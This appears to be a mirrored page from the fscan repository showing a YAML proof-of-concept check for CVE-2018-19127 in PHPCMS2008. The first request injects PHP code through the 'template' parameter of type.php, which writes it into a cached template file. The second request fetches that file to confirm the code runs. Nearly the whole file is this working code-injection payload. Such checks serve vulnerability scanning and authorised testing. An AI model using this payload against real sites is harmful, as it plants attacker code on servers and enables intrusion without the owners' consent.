mirror of https://github.com/qwqdanchun/fscan.git
21 lines
581 B
YAML
21 lines
581 B
YAML
name: poc-yaml-phpcms-cve-2018-19127
|
|
set:
|
|
r: randomInt(800000000, 1000000000)
|
|
rules:
|
|
- method: GET
|
|
path: /type.php?template=tag_(){}%3b@unlink(file)%3becho md5($_GET[1])%3b{//../rss
|
|
follow_redirects: true
|
|
expression: |
|
|
response.status == 200
|
|
- method: GET
|
|
path: /data/cache_template/rss.tpl.php?1={{r}}
|
|
follow_redirects: true
|
|
expression: |
|
|
response.body.bcontains(bytes(md5(string(r))))
|
|
|
|
detail:
|
|
author: pa55w0rd(www.pa55w0rd.online/)
|
|
Affected Version: "PHPCMS2008"
|
|
links:
|
|
- https://github.com/ab1gale/phpcms-2008-CVE-2018-19127
|